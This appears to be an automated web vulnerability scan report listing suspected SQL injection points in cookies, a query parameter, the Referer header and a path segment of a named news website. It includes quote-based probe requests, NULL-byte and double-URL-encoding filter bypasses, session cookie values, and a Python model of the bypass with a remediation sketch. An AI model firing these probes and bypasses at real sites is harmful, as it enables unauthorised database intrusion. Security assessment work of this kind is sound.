s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss'' HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%00'; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>No coincidence that DeBartolo's first semifinalist berth comes a full decade after he was forced to sell the 49ers when he pleaded guilty for failing to report a felony amid a corruption case against then-Louisiana Gov. Edwin Edwards.</p> ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16755984?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B%00''; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Now 64 and 10 years removed from being San Francisco 49ers owner, DeBartolo sounds more tha ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Even though theyre 4-7, 49ers take attitude someone has to win NFC West, so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1678 ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the currBrandCheck cookie as the web server will have already carried out one decode. The double-encoded probe succeeding means the value is URL-decoded twice somewhere between the web server and the query: whatever performs the blocking sees %27, while the query sees the quote. In any case, the application should perform its input validation after any custom canonicalisation has been carried out, and bind the value as a query parameter rather than rely on the filter at all.
Request 1
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews%2527; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Even though theyre 4-7, 49ers take attitude someone has to win NFC West, so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16781111?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews%2527%2527; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1678 ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /tim-kawakami/ci_16793240?source=most_viewed%00' HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT=''><meta name="keywords" content="Tim Kawakami sports column opinion "/><title>Tim Kawakami: ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /tim-kawakami/ci_16793240?source=most_viewed%00'' HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/tim-kawakami/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the UserID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /warriors/ci_16780373?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors offense isnt moving as fast as it once did'><meta name="keywords" conten ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16780373?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI%2527%2527; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors offense isnt moving as fast as it once did'><meta name="keywords" conten ...[SNIP]...
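The two filter bypasses reported in this section (the URL-encoded NULL byte placed ahead of the blocked character, and the double-encoded %2527) together with the remediation advice to validate only after canonicalisation, modelled as an added example that is not part of the scanner's report or of the site's code. The blocklist, the decode-once-then-filter pipeline, the application's second decode and the allow-list pattern are all assumptions made for the demonstration; the cookie values are the ones from the requests above.

```python
import re
from urllib.parse import unquote

# Constructed blocklist standing in for the WAF's injection signatures (an assumption).
BLOCKED_FRAGMENTS = ("'", "--", "/*", " or ", " union ")

# Allow-list for the opaque cookie values seen in the requests (an assumption; a real
# application defines the pattern per input, according to what it actually accepts).
COOKIE_VALUE = re.compile(r"[A-Za-z0-9_.-]+")


def server_decode(raw: str) -> str:
    """The web server URL-decodes a cookie or parameter value exactly once."""
    return unquote(raw)


def native_waf_blocks(value: str) -> bool:
    """Models a filter written in native code: its C string routines treat the first NUL
    as the end of the value, so the bytes after %00 are never inspected. Python strings
    are not NUL-terminated, so the truncation is done explicitly here."""
    inspected = value.split("\x00", 1)[0].lower()
    return any(fragment in inspected for fragment in BLOCKED_FRAGMENTS)


def app_second_decode(value: str) -> str:
    """Models the application's own, redundant second URL-decode: %27 becomes a quote."""
    return unquote(value)


def reaches_sql_vulnerable(raw: str):
    """Original pipeline: decode once, filter, decode again. Returns the value the SQL
    layer receives, or None when the filter stops the request."""
    value = server_decode(raw)
    if native_waf_blocks(value):
        return None
    return app_second_decode(value)


def accept_fixed(raw: str) -> bool:
    """Remediated order: apply every decode the application performs first, refuse an
    embedded NUL outright, then validate the canonical value against the allow-list.
    The value must still be bound as a query parameter; this only rejects obvious junk."""
    canonical = app_second_decode(server_decode(raw))
    if "\x00" in canonical:  # a NUL is never a legitimate part of these values
        return False
    return COOKIE_VALUE.fullmatch(canonical) is not None
```

reaches_sql_vulnerable("hikxwtryu4'") is stopped by the filter, but "hikxwtryu4%00'" passes it because only "hikxwtryu4" is inspected, and "mngimercurynews%2527" passes because the filter sees "%27" while the query receives the quote. accept_fixed rejects both bypass payloads and accepts the plain cookie values; the first step of the real fix is to remove the second decode altogether, after which the quote-bearing input never reaches the query as syntax because it is bound as a parameter.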
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/ci_16781614 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16781614 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/warriors/ci_16781614 ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /warriors/ci_16781614?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /warriors/ci_16781614?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Warriors at Oklahoma CityTip: 4 p.m., Ford ArenaTV/Radio: CSNBA; 680-AMRecords: Warriors 8- ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors'/ci_16786557?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='It marked the fifth time the Warriors were down double-digits early. They lost Sunday after ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2=""; // Sub section 1
s.prop3=""; // Sub section 2
...[SNIP]...
Request 2
GET /warriors''/ci_16786557?source=rss HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
